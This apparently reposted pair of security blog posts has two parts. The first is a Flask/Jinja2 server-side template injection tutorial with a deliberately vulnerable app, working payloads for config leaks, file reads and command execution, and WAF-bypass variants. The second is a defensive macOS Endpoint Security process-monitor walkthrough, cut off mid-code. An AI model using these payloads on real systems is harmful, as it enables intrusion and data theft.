Explaining Server Side Template Injections Web Hacking chivato Hey, I am chivato, this is my first post on here and I hope it is of some use to people. Exploiting SSTI in strange cases will be the next post I make. Any and all feedback is appreciated <3. Building the environment: We start with just a basic flask web application, written in python (I will be using python 2), which is as follows: from flask import * app = Flask(__name__) @app.route("/") def home(): return "Hello, World!" if __name__ == "__main__": app.run(debug=True, host="localhost", port=1337) This website will just return “Hello, World!” when visited. Now, we need to add parameters so we can interact with the web application. This can be done with the “requests” part of Flask, so we just add request.args.get(‘parameter name’). In my case the parameter will be called “name”, here is how our code should look: from flask import * app = Flask(__name__) @app.route("/") def home(): output = request.args.get('name') return output if __name__ == "__main__": app.run(debug=True, host="localhost", port=1337) But since this always returns the value in the get request, if you go to the website without a get parameter called name, you will get an error. To fix this I included a simple if statement: from flask import * app = Flask(__name__) @app.route("/") def home(): output = request.args.get('name') if output: pass else: output = "Empty" return output if __name__ == "__main__": app.run(debug=True, host="localhost", port=1337) Perfect, now we have a flask app that returns the value in the get parameter and doesn’t crash. Now to implement the vulnerability, the vulnerability consists of templates being executed on the side of the server, when we have control of what the template contains, for example a vulnerability was found in Uber by the famous bug hunter known as orange, it consisted of making your profile name follow the template syntax for jinja2 (which is {{template content}} for jinja2). and then when you received the email, the template had been executed. So, imagine you set {{‘7’*7}} as your username, when you receive the email, you will see “Welcome 7777777.” As stated above, the vulnerability comes into play when the template is executed on the side of the server, and we control the input, so let’s make sure our input is rendered. This can be done with render_template_string from flask. This takes a string, and treats it as text that may have any templates in it, if it does, then it executes the template. from flask import * app = Flask(__name__) @app.route("/") def home(): output = request.args.get('name') output = render_template_string(output) if output: pass else: output = "Sp0re<3" return output if __name__ == "__main__": app.run(debug=True, host="localhost", port=1337) As you can see, now, if you visit “http://localhost:1337/?name={{‘7’*7} 3}”, you will be welcomed with “7777777”. We now have our environment setup and ready to play with (later on I will be looking at some simple WAF bypass methods, but for now we are just leaving our script as this). Recongnising and exploiting the vulnerability: So template engines are used VERY widely nowadays, and they exist for a variety of different languages, such as PHP, JS, Python (obviously), ruby and many more. The base of why they are useful is in case you have a large website or platform, where not many details change between pages. For example, netflix, has the same layout for it’s content, and the only things that change are: title, description, banner and some other minor details, so instead of creating a whole page per show, they just feed the data to their templates, and then the engine puts it all together. Template engines can be used for anything that follows that process of having to use the same thing tons of times, so in Uber’s example instead of making a new email every time, they had a single email template, and just changed in the name each time. So, knowing that we can execute templates, what can we actually do with that, well, honestly a lot. > Read the configuration. This can be used to grab the SECRET_KEY which is used to sign cookies, with this, you can create and sign your own cookies. Example payload for Jinja2: {{ config }} > Read local files (LFR). This can be used to do a variety of things, ranging from directly reading a flag if it is held in the templates folder with a basic {% include ‘flag.txt’ %}, to reading any file on the system this can be via the RCE payload (see next point), or via an alternative. An example payload of an alternative would be: {{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }} //May vary depending on version. > Remote command execution (RCE). Finally, the remote command execution payload. Obviously the most severe and dangerous one, and can be done a variety of ways, one is going through the subclasses and finding the subprocess.Popen number: {{''.__class__.mro()[1].__subclasses__()[ HERE IS WHERE THE NUMBER WOULD GO ]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}} Although I have had much more success with the following payload, which uses Popen without guessing the offset. {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("whoami").read().zfill(417)}}{%endif%}{% endfor %} You may need to go to the end of the page to skip all the 0’s that are produced from that payload. Now that some of the basic exploits are over, we can take a look at bypass methods. Let’s start with the parameter bypass method. Imagine you have a template engine, in this case flask, that takes a value from a parameter and removes any “_” from it. This would restrict us from doing a variety of things, for example {{ __class__ }}. So, this bypass mehtod is based off of the idea that, only that parameter gets checked for the underscores. So all we have to do is pass the underscores via another parameter, and call them from our template injection. We start with calling the class attribute from request (The waf would block the underscores). {{request.__class__}} Then, we remove the “.” and user the |attr to tell the template that we are using request’s attributes. {{request|attr("__class__")}} We pipe the whole content of the “attribute” parameter to a “join” function, which sticks all of the value together, in this case it would stick “", “class” and "” together, to create class. {{request|attr(["__","class","__"]|join)}} We then remove one of the underscores, and just multiply the single one by two, in python, using “[STRING]”*[NUMBER] will make a new string of the previously stated strings, that amount of times. So “test”*3 would be equal to “testtest”. {{request|attr(["_"*2,"class","_"*2]|join)}} Finally, we tell the paytload to get the underscores from the other parameter called “usc”, and we add the underscores to the other parameter, an example URL to use against our script would be: http://localhost:1337/?name={{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}&usc=_ This may just return Empty, since we set an if statement that basically stated if out rendered template is empty then just set the output to Empty. Moving on to the next bypass method, this one is used to bypass the “[”, “]” being blocked, since they are needed for the payload stated above. It is honestly just a syntax thing, but it manages to achieve the same thing, without having to use any “[”, “]”, or “_”. Some examples are: http://localhost:5000/?exploit={{request|attr((request.args.usc*2,request.args.class,request.args.usc*2)|join)}}&class=class&usc=_ http://localhost:5000/?exploit={{request|attr(request.args.getlist(request.args.l)|join)}}&l=a&a=_&a=_&a=class&a=_&a=_ These were pulled from an amazing page called “PayloadAllTheThings”, link can be found at the bottom of the article in the sources part. Another one is in case “.” is blocked, and it uses the Jinja2 filters with |attr(): http://localhost:1337/?name={{request|attr(["_"*2,"class","_"*2]|join)}} Finally, a bypass method that is used in case “[”, “]”, “|join” and / or “_” is blocked, since it uses none of the previously stated characters: http://localhost:5000/?exploit={{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a))}}&f=%s%sclass%s%s&a=_ Now these are just the base bypass payloads, but can be combined and manipulated to achieve some amazing things. Here is a payload I made myself to build a payload that leaks the config: {{request|attr(["url",request.args.usc,"for.",request.args.usc*2,request.args.1,request.args.usc*2,".current",request.args.usc,"app.",request.args.conf]|join)}}&1=globals&usc=_&link=url&conf=config Conclusion: This has just been a basic explanation of how to setup a website vulnerable to SSTI, how the exploitation works, and some basic bypass methods for any WAF’s that you may encounter. Also would like to shout out a moderator from HackTheBox called “makelaris”, since he was actually the one who sparked my interest for SSTI’s, and has taught me a lot about them. If this post is enjoyed and appreciated I will make more about more advanced SSTI exploitation cases, and also how SSTI’s may work and be exploited in other template engines. Sources: PayloadAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md 13 pequalsnp-team: https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti 2 A good HackTheBox retired machine that has an SSTI step: Oz (https://www.hackthebox.eu/home/machines/profile/152 2) A writeup for Oz machine: https://0xdf.gitlab.io/2019/01/12/htb-oz.html 1 More exploring SSTI’s: https://nvisium.com/blog/2016/03/09/exploring-ssti-in-flask-jinja2.html 2 Orange’s disclosed bug bounty report from Uber: https://hackerone.com/reports/125980 10 Sursa: https://0x00sec.org/t/explaining-server-side-template-injections/16297
-
Writing a Process Monitor with Apple's Endpoint Security Framework September 7, 2019 Our research, tools, and writing, are supported by “Friends of Objective-See” Today’s blog post is brought to you by: CleanMy Mac X Malwarebytes Airo AV Become a Friend! # ./processMonitor Starting process monitor...[ok] PROCESS EXEC ('ES_EVENT_TYPE_NOTIFY_EXEC') pid: 7655 path: /bin/ls uid: 501 args: ( ls, "-lart", "." ) signing info: { cdHash = 5180A360C9484D61AF2CE737EAE9EBAE5B7E2850; csFlags = 603996161; isPlatformBinary = 1 (true); signatureIdentifier = "com.apple.ls"; } On github: Process Monitoring Library Background A common component of (many) security tools is a process monitor. As its name implies, a process monitor watches for the creation of new processes (plus extracts information such as process id, path, arguments, and code-signing information). Many of my Objective-See tools track process creations. Examples include: Ransomwhere? Tracks process creations to classify processes (as belonging to the OS/Apple, from 3rd-party developers. etc.) such that if a process beings rapidly encrypting files, Ransomwhere? can quickly determine if this encryption is legitimate or possibly ransomware. TaskExplorer Tracks process creations (and terminations) in order to display a real-time list of active processes to the user. BlockBlock Tracks process creations to map process identifiers (pids) reported in persistent file events to full process paths in order to provide more informative alerts to users, when persistence events occur. After a while I got tired of including duplicative process monitoring code in each project, so decided to write a process monitoring library. Now, any tool that is interested in tracking process events can simply link against this library. The source code for this (original) process monitoring library, can be found on the Objective-See’s github page: Proc Info Until now, the preferred way to programmatically create a process monitor was to subscribe to events from Apple’s OpenBSM subsystem. For a deep-dive into the OpenBSM subsystem, check out my ShmooCon talk: “Get Cozy with OpenBSM Auditing“ Though sufficient, the OpenBSM subsystem is rather painful to programmatically interface with. For starters, it requires one to parse and tokenize various (binary) audit records and audit tokens (that amongst other things contain process-related events): 1//init (remaining) balance to record's total length 2recordBalance = recordLength; 3 4//init processed length to start (zer0) 5processedLength = 0; 6 7//parse record 8// read all tokens/process 9while(0 != recordBalance) 10{ 11 //extract token 12 // and sanity check 13 if(-1 == au_fetch_tok(&tokenStruct, recordBuffer + processedLength, recordBalance)) 14 { 15 //error 16 // skip record 17 break; 18 } 19 20 //now parse tokens 21 // looking for those that are related to process start/terminated events 22 23 //add length of current token 24 processedLength += tokenStruct.len; 25 26 //subtract length of current token 27 recordBalance -= tokenStruct.len; 28 29} Moreover, the audit events delivered by the OpenBSM subsystem do not contain information about the processes code-signing identifies. Thus once you receive an audit event related to process creation, if you want to know for example, if said process is signed by Apple proper, you have to write extra code to programmaticly extract this information. This is relatively non-trivial and may be computationally (CPU) intensive. Finally, the OpenBSM audit subsystem (by design) is reactive, meaning that by the time you’ve received the events (i.e. process creation) it’s already occurred. This runs the gamut from being mildly annoying (for example, a short-lived process may have already exited, being you cannot query it to retrieve it’s code-signing identity) to well rather problematic. For example, if you’re a writing a security tool, clearly there exist many scenarios where being proactive about process events would be ideal (i.e. blocking a piece of malware before its allowed to execute). Until now, the only way to realize proactive security protections was to live in the kernel (something that Apple is rather drastically deprecating) Apple’s Endpoint Security Framework With Apple’s push to kick 3rd-party developers (including security products) out of the kernel, coupled with the realization (finally!) that the existing subsystems were rather archaic and dated, Apple recently announced the new, user-mode “Endpoint Security Framework” (that provides a user-mode interface to a new “Endpoint Security Subsystem”). As we’ll see, this framework addresses many of the aforementioned issues & shortcomings. Specifically it provides a: well-defined and (relatively) simple API comprehensive process code-signing information for events the ability to proactively respond to process events (though here, our process monitor will be passive). I’m often somewhat critical of Apple’s security posture (or lack thereof). However, the “Endpoint Security Framework” is potentially a game-changer for those of us seeking to write robust user-mode security tools for macOS. Mahalo Apple! Personally I’m stoked 🥳 This blog is practical walk-thru of creating a process monitor which leverages Apple’s new framework. For more information on the Endpoint Security Framework, see Apple’s developer documentation: Endpoint Security Framework In this blog, we’ll illustrate exactly how to create a comprehensive user-mode process monitor that leverages Apple’s new framework. There are a few prerequisites to leverage the Endpoint Security Framework that include: The com.apple.developer.endpoint-security.client entitlement This can be requested from Apple via this link. Until then (I’m still waiting 😅), give yourself that entitlement (i.e. in your app’s Info.plist file, and disable SIP such that it remains pseudo-unenforced). <dict> <key>com.apple.developer.endpoint-security.client</key> <true/> </dict> Xcode 11/macOS 10.15 SDK As these are both (still) in beta, for now, it’s recommended to perform development in a virtual machine (running macOS 10.15, beta). macOS 10.15 (Catalina) It appears the Endpoint Security Framework will not be made available to older versions of macOS. As such, any tools the leverage this framework will only run on 10.15 or newer. Ok enough chit-chat, let’s dive in! Our goal is simple: create a comprehensive user-mode process monitor that leverages Apple’s new “Endpoint Security Framework”. Besides “capturing” process events, we’re also interested in: the process id (pid) the process path any process arguments any process code-signing information …luckily, unlike the OpenBSM subsystem, the new Endpoint Security Framework makes this a breeze! Besides Apple’s documentation, the “Endpoint Security Demo” on github, by a developer named Omar Ikram was hugely helpful! Thanks Omar! 🙏 In order to subscribe to events from the “Endpoint Security Subsystem”, we must first create a new “Endpoint Security” client. The es_new_client function provides the interface to perform this action: Various (well commented!) header files in the usr/include/EndpointSecurity/ directory (such as ESClient.h) are also great resources. $ ls /Library/Developer/CommandLineTools/SDKs /MacOSX10.15.sdk/usr/include/EndpointSecurity/ ESClient.h ESMessage.h ESOpaqueTypes.h ESTypes.h EndpointSecurity.h $ less EndpointSecurity/ESClient.h struct es_client_s; /** * es_client_t is an opaque type that stores the endpoint security client state */ typedef struct es_client_s es_client_t; /** * Initialise a new es_client_t and connect to the ES subsystem * @param client Out param. On success this will be set to point to the newly allocated es_client_t. * @param handler The handler block that will be run on all messages sent to this client * @return es_new_client_result_t indicating success or a specific error. */ In code, we first include the EndpointSecurity.h file, declare a global variable (type: es_client_t*), then invoke the es_new_client function: 1#import <EndpointSecurity/EndpointSecurity.h> 2 3//(global) endpoint client 4es_client_t* endpointClient = nil; 5 6//create client 7// callback invokes (user) callback for new processes 8result = es_new_client(&endpointClient, ^(es_client_t *client, const es_message_t *message) 9{ 10 //process events 11 12}); 13 14//error? 15if(ES_NEW_CLIENT_RESULT_SUCCESS != result) 16{ 17 //err msg 18 NSLog(@"ERROR: es_new_client() failed with %d", result); 19 20 //bail 21 goto bail; 22} Note that the es_new_client function takes an (out) pointer to the variable of type es_client_t. Once the function returns, this variable will hold the initialized endpoint security client (required by all other endpoint security APIs). The second parameter of the es_new_client function is a block that will be automatically invoked on endpoint security events (more on this shortly!) The es_new_client function returns a variable of type es_new_client_result_t. Peeking at the ESTypes.h reveals the possible values for this variable: $ less MacOSX10.15.sdk/usr/include/EndpointSecurity/ESTypes.h /** @brief Error conditions for creating a new client */ typedef enum { ES_NEW_CLIENT_RESULT_SUCCESS, ///One or more invalid arguments were provided ES_NEW_CLIENT_RESULT_ERR_INVALID_ARGUMENT, ///Communication with the ES subsystem failed ES_NEW_CLIENT_RESULT_ERR_INTERNAL, ///The caller is not properly entitled to connect ES_NEW_CLIENT_RESULT_ERR_NOT_ENTITLED, ///The caller is not permitted to connect. They lack Transparency, Consent, and Control (TCC) approval form the user. ES_NEW_CLIENT_RESULT_ERR_NOT_PERMITTED } es_new_client_result_t; Hopefully these are rather self explanatory (i.e. ES_NEW_CLIENT_RESULT_SUCCESS means ok! while ES_NEW_CLIENT_RESULT_ERR_NOT_ENTITLED means you don’t hold the com.apple.developer.endpoint-security.client entitlement). If all is well, the es_new_client function will return ES_NEW_CLIENT_RESULT_SUCCESS indicating that it has created newly initialized Endpoint Security client (es_client_t) for us to use. To compile the above code, link against the Endpoint Security Framework (libEndpointSecurity) Once we’ve created an instance of a es_new_client, we now must tell the Endpoint Security Subsystem what events we are interested in (or want to “subscribe to”, in Apple parlance). This is accomplished via the es_subscribe function (documented here and in the ESClient.h header file): $ less MacOSX10.15.sdk/usr/include/EndpointSecurity/ESClient.h /** * Subscribe to some set of events * @param client The client that will be subscribing * @param events Array of es_event_type_t to subscribe to * @param event_count Count of es_event_type_t in `events` * @return es_return_t indicating success or error * @note Subscribing to new event types does not remove previous subscriptions */ OS_EXPORT API_AVAILABLE(macos(10.15)) API_UNAVAILABLE(ios, tvos, watchos) es_return_t es_subscribe(es_client_t * _Nonnull client, es_event_type_t * _Nonnull events, uint32_t event_count); This function takes the initialized endpoint client (returned by the es_new_client function), an array of events of interest, and the size of said array: 1//(process) events of interest 2es_event_type_t events[] = { 3 ES_EVENT_TYPE_NOTIFY_EXEC, 4 ES_EVENT_TYPE_NOTIFY_FORK, 5 ES_EVENT_TYPE_NOTIFY_EXIT 6}; 7 8//subscribe to events 9if(ES_RETURN_SUCCESS != es_subscribe(endpointClient, events, 10 sizeof(events)/sizeof(events[0]))) 11{ 12 //err msg 13 NSLog(@"ERROR: es_subscribe() failed"); 14 15 //bail 16 goto bail; 17} The events of interest depends on well, what events are of interest to you! As we’re writing a process monitor we’re (only) interested in the following three process-related events: ES_EVENT_TYPE_NOTIFY_EXEC “A type that represents process execution notification events.” ES_EVENT_TYPE_NOTIFY_FORK “A type that represents process forking notification events.” ES_EVENT_TYPE_NOTIFY_EXIT “A type that represents process exit notification events.” For a full list of events that one may subscribe to, take a look at the es_event_type_t enum in the ESTypes.h header file: $ less MacOSX10.15.sdk/usr/include/EndpointSecurity/ESTypes.h /** * @brief The valid event types recognized by EndpointSecurity */ typedef enum { ES_EVENT_TYPE_AUTH_EXEC , ES_EVENT_TYPE_AUTH_OPEN , ES_EVENT_TYPE_AUTH_KEXTLOAD , ES_EVENT_TYPE_AUTH_MMAP , ES_EVENT_TYPE_AUTH_MPROTECT , ES_EVENT_TYPE_AUTH_MOUNT , ES_EVENT_TYPE_AUTH_RENAME , ES_EVENT_TYPE_AUTH_SIGNAL , ES_EVENT_TYPE_AUTH_UNLINK , ES_EVENT_TYPE_NOTIFY_EXEC , ES_EVENT_TYPE_NOTIFY_OPEN , ES_EVENT_TYPE_NOTIFY_FORK , ES_EVENT_TYPE_NOTIFY_CLOSE , ES_EVENT_TYPE_NOTIFY_CREATE , ES_EVENT_TYPE_NOTIFY_EXCHANGEDATA , ES_EVENT_TYPE_NOTIFY_EXIT , ES_EVENT_TYPE_NOTIFY_GET_TASK , ES_EVENT_TYPE_NOTIFY_KEXTLOAD , ES_EVENT_TYPE_NOTIFY_KEXTUNLOAD , ES_EVENT_TYPE_NOTIFY_LINK , ES_EVENT_TYPE_NOTIFY_MMAP , ES_EVENT_TYPE_NOTIFY_MPROTECT , ES_EVENT_TYPE_NOTIFY_MOUNT , ES_EVENT_TYPE_NOTIFY_UNMOUNT , ES_EVENT_TYPE_NOTIFY_IOKIT_OPEN , ES_EVENT_TYPE_NOTIFY_RENAME , ES_EVENT_TYPE_NOTIFY_SETATTRLIST , ES_EVENT_TYPE_NOTIFY_SETEXTATTR , ES_EVENT_TYPE_NOTIFY_SETFLAGS , ES_EVENT_TYPE_NOTIFY_SETMODE , ES_EVENT_TYPE_NOTIFY_SETOWNER , ES_EVENT_TYPE_NOTIFY_SIGNAL , ES_EVENT_TYPE_NOTIFY_UNLINK , ES_EVENT_TYPE_NOTIFY_WRITE , ES_EVENT_TYPE_AUTH_FILE_PROVIDER_MATERIALIZE , ES_EVENT_TYPE_NOTIFY_FILE_PROVIDER_MATERIALIZE , ES_EVENT_TYPE_AUTH_FILE_PROVIDER_UPDATE , ES_EVENT_TYPE_NOTIFY_FILE_PROVIDER_UPDATE , ES_EVENT_TYPE_AUTH_READLINK , ES_EVENT_TYPE_NOTIFY_READLINK , ES_EVENT_TYPE_AUTH_TRUNCATE , ES_EVENT_TYPE_NOTIFY_TRUNCATE , ES_EVENT_TYPE_AUTH_LINK , ES_EVENT_TYPE_NOTIFY_LOOKUP , ES_EVENT_TYPE_LAST } es_event_type_t; Note there are two main event types: ES_EVENT_TYPE_AUTH_* and ES_EVENT_TYPE_NOTIFY_* ES_EVENT_TYPE_AUTH_* Events that require a response before being allowed to proceed. For example, the ES_EVENT_TYPE_AUTH_EXEC will block a process execution, until the subscriber (i.e. your security tool) provides a response. ES_EVENT_TYPE_NOTIFY_* Events that simply notify the subscriber (e.g. they do not require a response before being allowed to proceed). For example, the ES_EVENT_TYPE_NOTIFY_EXEC event simply notifies one that a process is (about to)execute. In our process monitor, we only utilize ES_EVENT_TYPE_NOTIFY_* events. These events are also succinctly described in Apple’s documentation for the es_event_type_t enumeration. Once the es_subscribe function successfully returns (ES_RETURN_SUCCESS), the Endpoint Security Subsystem will start delivering events. Event/Message Delivery We (just) discussed how to subscribe to events from the Endpoint Security Subsystem by invoking: es_new_client function es_subscribe function Of course, we’ll want add some logic/code process received messages. Recall that the final argument of the es_new_client function is a callback block (or handler). Apple states: “The handler block…will be run on all messages sent to this client.” The block is invoked with the endpoint client, and most importantly the message from the Endpoint Security Subsystem. This message variable is a pointer of type es_message_t (i.e. es_message_t*). Apple adequately “documents” the es_message_t structure in the (aptly named) ESMessage.h file, and also online. $ less MacOSX10.15.sdk/usr/include/EndpointSecurity/ESMessage.h /** * es_message_t is the top level datatype that encodes information sent from the ES subsystem to it's clients * Each security event being processed by the ES subsystem will be encoded in an es_message_t * A message can be an authorization request or a notification of an event that has already taken place * The action_type indicates if the action field is an auth or notify action * The event_type indicates which event struct is defined in the event union. */ typedef struct { uint32_t version; struct timespec time; uint64_t mach_time; uint64_t deadline; es_process_t * _Nullable process; uint8_t reserved[8]; es_action_type_t action_type; union { es_event_id_t auth; es_result_t notify; } action; es_event_type_t event_type; es_events_t event; uint64_t opaque[]; /* Opaque data that must not be accessed directly */ } es_message_t; Notable members of interest include: es_process_t * process A pointer to a structure that describes the process responsible for the event. es_event_type_t event_type The type of event (that will match one of the events we subscribed to, e.g. ES_EVENT_TYPE_NOTIFY_EXEC) event_type event An event specific structure (i.e. es_event_exec_t exec) Since we only subscribed to three events (ES_EVENT_TYPE_NOTIFY_EXEC, ES_EVENT_TYPE_NOTIFY_FORK, and ES_EVENT_TYPE_NOTIFY_EXIT) processes the received messages is fairly straight forward. For each of these three events, we are interested in extracting a pointer to a es_process_t which will hold the information about the process (starting, forking, or terminating). Recall the es_message_t structure received in the es_new_client callback contains a member: es_process_t * process (message->process). However, as noted this is the process responsible for the action, which might not always be the es_process_t * we’re actual interested in. Huh? In the case of a process exec (ES_EVENT_TYPE_NOTIFY_EXEC) event, the message->process will describe the process that is responsible for spawning the process. In other words, the parent. We are interested actually in the child, that is, the process that is about to be (or just was) spawned. For example, if we hop into a terminal and run the ls command the message->process points to the shell process (/bin/zsh). This of course is the parent - the process responsible for executing /bin/ls: (lldb) p message->process.executable.path (es_string_token_t) $17 = (length = 8, data = "/bin/zsh") So how do we ‘find’ the es_process_t * that points to the child process (/bin/ls)? Recall the message structure contains a member named event_type In the case of a process exec this will be set to ES_EVENT_TYPE_NOTIFY_EXEC and the message->event will point to a es_event_exec_t structure (defined in ESMessage.h😞 $ less MacOSX10.15.sdk/usr/include/EndpointSecurity/ESMessage.h typedef struct { es_process_t * _Nullable target; es_token_t args; uint8_t reserved[64]; } es_event_exec_t; The target member of this structure contains a pointer to the es_process_t we’re interested in (i.e. the one that described /bin/ls😞 (lldb) p message->event.exec.target->executable.path (es_string_token_t) $16 = (length = 7, data = "/bin/ls") What about the other two events we’ve subscribed to? For ES_EVENT_TYPE_NOTIFY_FORK events, the message contains an events of type es_event_fork_t, which contains information about the child process in es_process_t * child. For ES_EVENT_TYPE_NOTIFY_EXIT events, we can simply use message->process (as the process that’s generating the exit event, is the process we’re interested in …that is to say the process that’s about to exit). If you’re comfortable reading code, the following should now make sense: 1//process of interest 2es_process_t* process = NULL; 3 4// set type 5// extract (relevant) process object, etc 6switch (message->event_type) { 7 8//exec 9case ES_EVENT_TYPE_NOTIFY_EXEC: 10 process = message->event.exec.target; 11 break; 12 13//fork 14case ES_EVENT_TYPE_NOTIFY_FORK: 15 process = message->event.fork.child; 16 break; 17 18//exit 19case ES_EVENT_TYPE_NOTIFY_EXIT: 20 process = message->process; 21 break; 22} Now we (finally) have a pointer to the (relevant) es_process_t process structure. The definition for this structure can be found in the ESMessage.h header file: $ less /MacOSX10.15.sdk/usr/include/EndpointSecurity/ESMessage.h ... /** * @brief describes a process that took the action being described in an es_message_t * For exec events also describes the newly executing process * */ typedef struct { audit_token_t audit_token; pid_t ppid; pid_t original_ppid; pid_t group_id; pid_t session_id; uint32_t codesigning_flags; bool is_platform_binary; bool is_es_client; uint8_t cdhash[CS_CDHASH_LEN]; es_string_token_t signing_id; es_string_token_t team_id; es_file_t * _Nullable executable; } es_process_t; The es_process_t structure is also documented by Apple as part of it Endpoint Security Subsystem developer documentation: Let’s discuss various fields in the structure, as they’ll be relevant for the process monitor we’re building. First, we’re interested in extracting the process id (pid) from this structure. Though the es_process_t doesn’t directly contain a process pid, it does contain an audit token (type: audit_token_t). In the ESMessage.h header file, Apple states that: “values such as PID, UID, GID, etc. can be extraced from the audit token via API in libbsm.h.” Specifically, we can invoke the audit_token_to_pid (passing in the audit_token member of the es_process_t structure): 1//extract pid pid 2pid_t pid = audit_token_to_pid(process->audit_token); Of course, we’re also interested in the path to the process’s executable. This is found within the executable member of the es_process_t structure. The executable is pointer to a es_file_t structure: $ less /MacOSX10.15.sdk/usr/include/EndpointSecurity/ESMessage.h ... /** * es_file_t provides the inode/devno and path to a file that relates to a security event * the path may be truncated, which is indicated by the path_truncated flag. */ typedef struct { es_string_token_t path; bool path_truncated; union { dev_t devno; fsid_t fsid; }; ino64_t inode; } es_file_t; The path to the process’s executable is found in the path member of the es_file_t structure (&process->executable->path). Its type is es_string_token_t (defined in ESTypes.h😞 $ less /MacOSX10.15.sdk/usr/include/EndpointSecurity/ESTypes.h /** * @brief Structure for handling packed blobs of serialized data */ typedef struct { size_t length; const char * data; } es_string_token_t; We can convert this to a more “friendly” data type such as a NSString via the following code snippet: 1//convert to data, then to string 2NSString* string = [NSString stringWithUTF8String:[[NSData dataWithBytes:stringToken->data length:stringToken->length] bytes]]; If the process event is a ES_EVENT_TYPE_NOTIFY_EXEC, the process->event member points to a es_exec_env structure, which a contains the process’s arguments (es_event_exec_t->args😞 $ less MacOSX10.15.sdk/usr/include/EndpointSecurity/ESMessage.h ... /** * Arguments and environment variables are packed, use the following functions to operate on this field: * `es_exec_env`, `es_exec_arg`, `es_exec_env_count`, and `es_exec_arg_count` */ typedef struct { es_process_t * _Nullable target; es_token_t args; uint8_t reserved[64]; } es_event_exec_t; As noted in comments with the ESMessage.h header file, the arguments are packed. The following helper method (which utilizes the es_exec_arg_count and es_exec_arg) unpacks all arguments into an array: 1//extract/format args 2-(void)extractArgs:(es_events_t *)event 3{ 4 //number of args 5 uint32_t count = 0; 6 7 //argument 8 NSString* argument = nil; 9 10 //get # of args 11 count = es_exec_arg_count(&event->exec); 12 if(0 == count) 13 { 14 //bail 15 goto bail; 16 } 17 18 //extract all args 19 for(uint32_t i = 0; i < count; i++) 20 { 21 //current arg 22 es_string_token_t currentArg = {0}; 23 24 //extract current arg 25 currentArg = es_exec_arg(&event->exec, i); 26 27 //convert argument (es_string_token_t) to string 28 argument = convertStringToken(¤tArg); 29 if(nil != argument) 30 { 31 //append 32 [self.arguments addObject:argument]; 33 } 34 } 35 36bail: 37 38 return; 39} Once we’ve extracted the process’s identifier (pid), path, and arguments, all that’s left is the code signing information. This is pretty trivial, as such code signing information is directly embedded in the es_process_t structure: code signing flags: (uint32_t) process->codesigning_flags These are “standard” mcaOS code-signing flags, found in the cs_blobs.h file code signing id: (es_string_token_t) process->signing_id This is “the identifier used to sign the process.” team id: (es_string_token_t) process->team_id This is “the team identifier used to sign the process.” cdHash: (uint8_t array[CS_CDHASH_LEN]) process->cdhash This is “The code directory hash value” Below is some (well-commented) code that extracts and formats code-signing information from the es_process_t structure, into a (ns)dictionary: 1//extract/format signing info 2-(void)extractSigningInfo:(es_process_t *)process 3{ 4 //cd hash 5 NSMutableString* cdHash = nil; 6 7 //signing id 8 NSString* signingID = nil; 9 10 //team id 11 NSString* teamID = nil; 12 13 //alloc string for hash 14 cdHash = [NSMutableString string]; 15 16 //add flags 17 self.signingInfo[KEY_SIGNATURE_FLAGS] = 18 [NSNumber numberWithUnsignedInt:process->codesigning_flags]; 19 20 //convert/add signing id 21 signingID = convertStringToken(&process->signing_id); 22 if(nil != signingID) 23 { 24 //add 25 self.signingInfo[KEY_SIGNATURE_IDENTIFIER] = signingID; 26 } 27 28 //convert/add team id 29 teamID = convertStringToken(&process->team_id); 30 if(nil != teamID) 31 { 32 //add 33 self.signingInfo[KEY_SIGNATURE_TEAM_IDENTIFIER] = teamID; 34 } 35 36 //add platform binary 37 self.signingInfo[KEY_SIGNATURE_PLATFORM_BINARY] = 38 [NSNumber numberWithBool:process->is_platform_binary]; 39 40 //format cdhash 41 for(uint32_t i = 0; i<CS_CDHASH_LEN; i++) 42 { 43 //append 44 [cdHash appendFormat:@"%X", process->cdhash[i]]; 45 } 46 47 //add cdhash 48 self.signingInfo[KEY_SIGNATURE_CDHASH] = cdHash; 49 50 return; 51} Although we’re generally more interested in process creation events, we might want also want to track process termination events (ES_EVENT_TYPE_NOTIFY_EXIT). When a ES_EVENT_TYPE_NOTIFY_EXIT is delivered, message->event will point to a structure of type: es_event_exit_t: typedef struct { int stat; uint8_t reserved[64]; } es_event_exit_t; From this structure, we can extract the process’s exit code (via the stat member): //grab process's exit code int exitCode = message->event.exit.stat; Process Monitor Library As noted, many of Objective-See’s tools track process creations, and thus currently utilize my original process monitoring library; Proc Info. This library leverages Apple’s OpenBSM subsystem, in order to provide process events. As we previously discussed, there are several complexities and limitations of the OpenBSM subsystem (most notably process events from the subsystem do not include code-signing information). Lucky us, as shown in this blog, we can now leverage Apple’s Endpoint Security Subsystem to effectively and comprehensively monitor process events (from user-mode!). As such, today, I’m releasing an open-source process monitoring library, that implements everything we’ve discussed here today 🥳 On github: Process Monitoring Library It’s fairly simple to leverage this library in your own (non-commercial) tools: Build the library, libProcessMonitor.a Add the library and its header file (ProcessMonitor.h) to your project: #import "ProcessMonitor.h" As shown above, you’ll also have link against the libbsm (for audit_token_to_pid) and libEndpointSecurity libraries. Add the com.apple.developer.endpoint-security.client entitlement (to your project’s Info.plist file). Write some code to interface with the library! This final steps involves instantiating a ProcessMonitor object and invoking the start method (passing in a callback block that’s invoked on process events). Below is some sample code that implements this logic: 1//init monitor 2ProcessMonitor* procMon = [[ProcessMonitor alloc] init]; 3 4//define block 5// automatically invoked upon process events 6ProcessCallbackBlock block = ^(Process* process) 7{ 8 switch(process.event) 9 { 10 //exec 11 case ES_EVENT_TYPE_NOTIFY_EXEC: 12 NSLog(@"PROCESS EXEC ('ES_EVENT_TYPE_NOTIFY_EXEC')"); 13 break; 14 15 //fork 16 case ES_EVENT_TYPE_NOTIFY_FORK: 17 NSLog(@"PROCESS FORK ('ES_EVENT_TYPE_NOTIFY_FORK')"); 18 break; 19 20 //exec 21 case ES_EVENT_TYPE_NOTIFY_EXIT: 22 NSLog(@"PROCESS EXIT ('ES_EVENT_TYPE_NOTIFY_EXIT')"); 23 break; 24 25 default: 26 break; 27 } 28 29 //print process info 30 NSLog(@"%@", process); 31 32}; 33 34//start monitoring 35// pass in block for events 36[procMon 